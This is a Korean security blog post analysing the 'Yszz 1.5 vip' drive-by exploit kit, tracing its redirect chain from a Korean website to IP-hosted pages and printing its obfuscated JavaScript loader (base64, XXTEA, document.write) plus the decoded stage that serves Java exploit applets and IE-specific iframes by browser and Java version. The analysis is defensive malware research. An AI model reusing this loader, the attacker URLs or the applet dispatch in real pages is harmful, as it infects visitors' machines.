

Yszz 1.5 vip !

발견지(최초 유입 페이지) : http://www.icross.co.kr/  — 아래 화살표(→)는 이 페이지에서 익스플로잇 페이지까지 스크립트가 로드/리다이렉션되는 순서

            →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js

               →http://205.164.25.146/pic/img.js

               →http://205.164.25.146/pic/img.html (Yszz 1.5 vip)

                   → http://205.164.25.146/pic/swfobject.js

                   → http://205.164.25.146/pic/jpg.js

               →http://205.164.25.146/pic/css.html



// Obfuscation prelude: %XX escape sequences are assembled as strings and later
// turned into real names by AVgHbu2f(), which is defined outside this excerpt
// (presumably unescape() or an equivalent — confirm from the omitted code).
var K4Er = "%";

// "%78%6F" -> "xo"
var MDIxo=K4Er+"78"+K4Er+"6F";

// "%78%6F%31" -> "xo1"
var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";

// "%31%59%53" -> "1YS"
var HHYWv=K4Er+"31"+"%59"+"%53";

// "%7A%7A%31" -> "zz1"
var CvXWz="%7A"+"%7A"+"%31";

// "%31%6F%78" -> "1ox"
var JZyjl="%31"+"%6F"+"%78";

// "%6F%78" -> "ox". None of MDIxo..ERb7H is referenced anywhere in the visible
// code, so they look like filler/decoy variables — verify against the omitted parts.
var ERb7H="%6F"+"%78";

var XGpwn2 =중략/

oI0Nl6jI2jrBT1pk+oIDWqCs=",HUx2Ydz="%64"+"

%6f"+"%63"+"%75"+"%6d"+"%65"+"%6e"+"%74",

sac5pxhFS="%77"+"%72"+"%69"+"%74"+"%65",ubo8KLEZHIPX2;

// Second obfuscation layer: built-in property names are assembled from %XX
// pieces and resolved through AVgHbu2f() (outside this excerpt; presumably
// unescape()). The decoded values are noted next to each piece.
// "%53%74%72" -> "Str"
var kxin1s = "%53"+"%74"+"%72";

// "Str" + "%69%6e%67" -> "String"
var B83pNx = kxin1s+"%69"+"%6e"+"%67";

// "fro" / "mCh" / "arC" / "ode" -> concatenated: "fromCharCode"
var kxin2s = "%66"+"%72"+"%6f";

var kxin3s = "%6d"+"%43"+"%68";

var kxin4s = "%61"+"%72"+"%43";

var kxin5s = "%6f"+"%64"+"%65";

var WjuQFO = kxin2s+kxin3s+kxin4s+kxin5s;

// fxTmFiR == "String", xZW9RVt == "fromCharCode": every
// window[fxTmFiR][xZW9RVt](...) call in the decoders below is String.fromCharCode(...).
var fxTmFiR = AVgHbu2f(B83pNx);

var xZW9RVt = AVgHbu2f(WjuQFO);

// "%41%72%72%61%79" -> "Array"; `new window[x83QqGV](...)` later is `new Array(...)`.
var sATWUn = "%41"+"%72"+"%72"+"%61"+"%79";

var x83QqGV = AVgHbu2f(sATWUn);

// "%73%74%72" -> the literal three-character string "str" (not a variable reference).
var SnDN8 = "%73"+"%74"+"%72";

// "%63%68%61%72%43%6f%64%65%41%74" -> "charCodeAt"
var Z0b9A = "%63"+"%68"+"%61"+"%72"+"%43"+"%6f"+"%64"+"%65"+"%41"+"%74";

// If AVgHbu2f is unescape, fkPj5 is the string "str" and fkPj5[hyYQ8] is
// "str".charCodeAt — tzWmUni() below calls this instead of str.charCodeAt on
// its argument; see the note on that function.
var fkPj5 = AVgHbu2f(SnDN8);

var hyYQ8 = AVgHbu2f(Z0b9A);

// Shaped like a UTF-8 byte-string -> JS string decoder: the lead byte's high
// nibble selects a 1-byte (0..7), 2-byte (12, 13) or 3-byte (14) sequence and
// the code point is re-packed with String.fromCharCode (window[fxTmFiR][xZW9RVt]).
// Two quirks to know before trusting its output:
//  * the byte values are read through the global fkPj5[hyYQ8], not from the
//    `str` argument; only the 1-byte fallback `str.charAt(i-1)` touches the
//    argument. If fkPj5 is the literal "str" (see its definition above), then
//    charCodeAt(0..2) are 0x73/0x74/0x72 (nibble 7) and everything past index 2
//    is NaN, NaN>>4 == 0 — so every position takes the 1-byte path and the
//    function returns `str` unchanged. Confirm AVgHbu2f before relying on this.
//  * lead nibbles 8..11 and 15 match no case and emit nothing (bytes dropped).
// Called once, on the XXTEA-decrypted second stage, right before document.write.
function tzWmUni(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=fkPj5[hyYQ8](i++);switch(c>>4)

// case 0..7: ASCII, copy the input char; 12/13: 2-byte sequence; 14: 3-byte sequence.
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=fkPj5[hyYQ8](i++);char3=fkPj5[hyYQ8](i++);out[out.length]=window[fxTmFiR][xZW9RVt](((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break;}}

return out.join('');}

var ZjykejU6Chars=new window[x83QqGV](-1,-1,-1,-중략--1,-1,-1);

HUx2Ydz=AVgHbu2f(HUx2Ydz);

// Base64 decoder. ZjykejU6Chars is the lookup table built on the truncated
// `new Array(...)` line above; from its use here it presumably maps a byte
// value to its 6-bit alphabet index, with -1 for non-alphabet bytes — confirm
// from the omitted part. Each do/while skips -1 entries, so whitespace or other
// junk inside the blob is tolerated. A byte of 61 ('=') in the 3rd or 4th slot
// is padding and ends decoding early. Output bytes are emitted as characters via
// String.fromCharCode (window[fxTmFiR][xZW9RVt]). The "Yszz 1.5 vip" comment is
// the kit's signature marker. Its result is the XXTEA ciphertext for kaixin().
function ZjykejU6(str)

{var YS1,YS2,YS3,YS4;/*Yszz 1.5 vip*/var i,len,out;

len=str.length;i=0;out = "";

while(i<len)

// 1st sextet (skip non-alphabet bytes; &0xff keeps the table index in range)
{do{YS1=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS1==-1);

if(YS1==-1)

// 2nd sextet
break;do{YS2=ZjykejU6Chars[str.charCodeAt(i++)&0xff]}while(i<len&&YS2==-1);

if(YS2==-1)

// byte 1 = top 6 bits of YS1 + top 2 of YS2
break;out+=window[fxTmFiR][xZW9RVt]((YS1<<2)|((YS2&0x30)>>4));

// 3rd sextet; 61 == '=' padding terminates
do{YS3=str.charCodeAt(i++)&0xff;if(YS3==61)

return out;

YS3=ZjykejU6Chars[YS3]}while(i<len&&YS3==-1);

if(YS3==-1)

// byte 2 = low 4 bits of YS2 + top 4 of YS3
break;out+=window[fxTmFiR][xZW9RVt](((YS2&0XF)<<4)|((YS3&0x3C)>>2));

// 4th sextet; 61 == '=' padding terminates
do{YS4=str.charCodeAt(i++)&0xff;if(YS4==61)

return out;YS4=ZjykejU6Chars[YS4]}while(i<len&&YS4==-1);if(YS4==-1)

// byte 3 = low 2 bits of YS3 + all of YS4
break;out+=window[fxTmFiR][xZW9RVt](((YS3&0x03)<<6)|YS4)}

return out}

// Converts an array of 32-bit words back into a string, four bytes per word,
// little-endian (low byte first), using String.fromCharCode resolved through
// the obfuscated globals window[fxTmFiR][xZW9RVt]. The array is overwritten in
// place with the per-word strings (callers see this side effect).
// When `w` is set the last word is taken as the original byte length and the
// joined string is trimmed to it (drops XXTEA zero padding); otherwise the full
// joined string is returned.
function long2str(v,w){
  var count=v.length;
  // read the trailing length word before the array is rewritten in place
  var trueLen=v[count-1]&0xffffffff;
  var idx=0;
  while(idx<count){
    var word=v[idx];
    v[idx]=window[fxTmFiR][xZW9RVt](word&0xff,(word>>>8)&0xff,(word>>>16)&0xff,(word>>>24)&0xff);
    idx++;
  }
  var text=v.join('');
  return w?text.substring(0,trueLen):text;
}

// Packs a string into an array of 32-bit words, four char codes per word,
// little-endian (first char in the low byte). charCodeAt past the end of the
// string yields NaN, which the shifts/ORs turn into 0, so a trailing partial
// word is zero-padded. When `w` is set the string length is appended as one
// extra word (the convention long2str(v,true) reads back).
function str2long(s,w){
  var words=[];
  var total=s.length;
  var pos=0;
  while(pos<total){
    var b0=s.charCodeAt(pos);
    var b1=s.charCodeAt(pos+1)<<8;
    var b2=s.charCodeAt(pos+2)<<16;
    var b3=s.charCodeAt(pos+3)<<24;
    words.push(b0|b1|b2|b3);
    pos+=4;
  }
  if(w){
    words.push(total);
  }
  return words;
}

// XGpwn2 is the long blob on the truncated declaration above (ends "...oIDWqCs=");
// after AVgHbu2f (presumably unescape) it becomes the key handed to kaixin(),
// the XXTEA decryptor. Only its first 16 bytes are ever indexed there.
ubo8KLEZHIPX2=AVgHbu2f(XGpwn2);

// XXTEA (Corrected Block TEA) *decryption* of `str` under key `Udkz`: delta is the
// TEA constant 0x9E3779B9, the mixing term is the XXTEA MX function, q = 6+52/(n+1)
// rounds, and `sum` counts down from q*delta — the inverse of the encrypt loop.
// Both inputs go through str2long (4 chars -> one little-endian word). The key is
// read as k[(p&3)^e], so only the first 16 bytes of Udkz matter; with fewer than
// 4 key words the missing entries read undefined, which ToInt32s to 0 (no error,
// just a weaker key). The last plaintext word holds the original length, which
// long2str(v,true) uses to trim the zero padding. Empty input returns "" as is.
// The name `kaixin` is reused for the applet variable in the decoded stage below;
// presumably just the kit's branding, not a call to this function — confirm.
function kaixin(str,Udkz){if(str==""){return"";}

// outer loop: one XXTEA round per iteration; inner loop walks the block backwards
var v=str2long(str,false);var k=str2long(Udkz,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}

// wrap-around step for v[0], then step `sum` back by delta
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}

return long2str(v,true);}

// "%77%72%69%74%65" -> "write" (declared on the truncated line above).
sac5pxhFS=AVgHbu2f(sac5pxhFS);

// Cn6T4bG0znIi is the base64 ciphertext blob, defined outside this excerpt.
// JS0W is assigned without `var`, i.e. it is an implicit global.
JS0W=Cn6T4bG0znIi;

// Second-stage unpacking pipeline: base64-decode -> XXTEA-decrypt with the key
// unescaped into ubo8KLEZHIPX2 -> tzWmUni (nominally a UTF-8 decode; see its note).
JS0W=tzWmUni(kaixin(ZjykejU6(JS0W), ubo8KLEZHIPX2));

// window["document"]["write"](JS0W): the decrypted HTML/JS is injected into the
// page and runs — presumably the applet/iframe dispatcher shown after "[생략]".
// For analysis, swap this sink for one that logs JS0W instead of executing it.
window[HUx2Ydz][sac5pxhFS](JS0W);


[생략]


   {
     // Then-branch of a condition whose header is omitted above ("[생략]"); this
     // reads as the decoded second stage. `kaixinm` is assigned in the omitted
     // code — the ranges compared below (15000–15031, 16000–16032, 17000–17003)
     // look like a numeric Java runtime version (1.5.0_xx, 1.6.0_xx, 1.7.0_xx) —
     // TODO confirm from the omitted code before relying on that reading.
     // A 1x1 applet is created and pointed at a JAR whose name ends in .jpg.
     var kaixin=document.createElement('applet');

     kaixin.width="1";

     kaixin.height="1";

     if((kaixinm<=16027 && kaixinm>=16000) || (kaixinm>=15000 && kaixinm<=15031))

     {

       // Branch 1: archive is a JAR served under a .jpg name; "dota" carries the
       // URL the applet is presumably given to fetch (the same jpg.css is passed
       // as "xiaomaolv" in the other branches) — the applet code is not shown here.
       kaixin.archive="6UXSEJgm.jpg";

       kaixin.code="GondadGondadExp.class";

       kaixin.setAttribute("dota","http://69.46.87.99/img/jpg.css");

       document.body.appendChild(kaixin);

     }

     // Branch 2. Note the third clause `kaixinm>=15035 && kaixinm<=15000` can never
     // hold (lower bound above upper bound) — a bug in the sample. Also, 16000–16027
     // was already taken by branch 1, so this branch effectively sees only
     // 16028–16032 and 17000–17003.
     else if ((kaixinm<=17003 && kaixinm>=17000) || (kaixinm<=16032 && kaixinm>=16000) ||(kaixinm>=15035 && kaixinm<=15000))

     {

       kaixin.archive="pvoszTc.jpg";

       kaixin.code="gond1723.Gondattack.class";

       // xiaomaolv / bn / si / bs are read applet-side; their meaning is not visible here.
       kaixin.setAttribute("xiaomaolv","http://69.46.87.99/img/jpg.css");

       kaixin.setAttribute("bn","woyouyizhixiaomaolv");

       kaixin.setAttribute("si","conglaiyebuqi");

       kaixin.setAttribute("bs","748");

       document.body.appendChild(kaixin);

     }

     else

     {

       // Branch 3 (all other kaixinm values): pick the loader by User-Agent.
       var ques3 = window.navigator.userAgent.toLowerCase();

       if (ques3.indexOf("msie 6") > -1)

       {

         // IE6: the same JAR/class is loaded through an <OBJECT> with an explicit
         // classid (presumably the Java plug-in ActiveX CLSID — confirm) and the
         // same parameters as <param>s. The listing is truncated at the start of
         // this line; read "...cument.write" as document.write.
         ...cument.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://69.46.87.99/img/jpg.css'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'DB6Jm.jpg'></OBJECT>");

       }

       else

       {

         // Other browsers: `kaixiny` is created in the omitted lines ("생략"),
         // presumably another createElement('applet'). The class name only hints
         // at a 2012 CVE; the actual CVE cannot be identified from this page.
         생략


         kaixiny.archive = "DB6Jm.jpg";

         kaixiny.code = "cve2012xxxx.Gondvv.class";

         kaixiny.setAttribute("xiaomaolv", "http://69.46.87.99/img/jpg.css");

         kaixiny.setAttribute("bn", "woyouyizhixiaomaolv");

         kaixiny.setAttribute("si", "conglaiyebuqi");

         kaixiny.setAttribute("bs", "748");

         document.body.appendChild(kaixiny);



       }



     }



   }

   else

   {

     var pcss=navigator.userAgent.toLowerCase();

     var UaYcKzD2 = window.navigator.userAgent.toLowerCase();

     if ((UaYcKzD2.indexOf('msie 8.0') > -1))

     {

       document.writeln("<iframe src=T0HE3R.html><\/iframe>");

       

     }

     else if ((UaYcKzD2.indexOf('msie 6.0') > -1) || (UaYcKzD2.indexOf('msie 7.0') > -1))

     {

       document.writeln("<iframe src=6cxyl.html><\/iframe>");

       

     }

     

   }

   

 }


버전이 올라가면서 뭔가 바뀌었을 줄 알았는데, 디코딩 루틴(base64 → XXTEA → document.write)이나 구조는 별달리 바뀐 게 없는 것처럼 느껴졌다.

디코딩해 보면 역시 MSIE 버전을 체크해서 버전별로 다른 페이지(IE8은 T0HE3R.html, IE6/7은 6cxyl.html)를 iframe으로 다시 연결하고, Java 버전으로 보이는 값(kaixinm)에 따라 서로 다른 애플릿 클래스를 고른다. 요새는 이렇게 브라우저·런타임 버전에 따라 익스플로잇을 골라 연결하는 방식이 대세인 것 같다.

Yszz도 공다팩(Gondad)의 다동처럼 앞으로 어떤 식으로 탐지를 우회해 갈지 조금 더 지켜봐야겠다!